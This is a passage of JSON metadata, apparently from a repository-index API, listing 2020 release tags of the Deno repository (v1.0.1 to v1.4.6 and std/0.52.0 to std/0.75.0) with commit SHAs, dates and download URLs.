ame":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0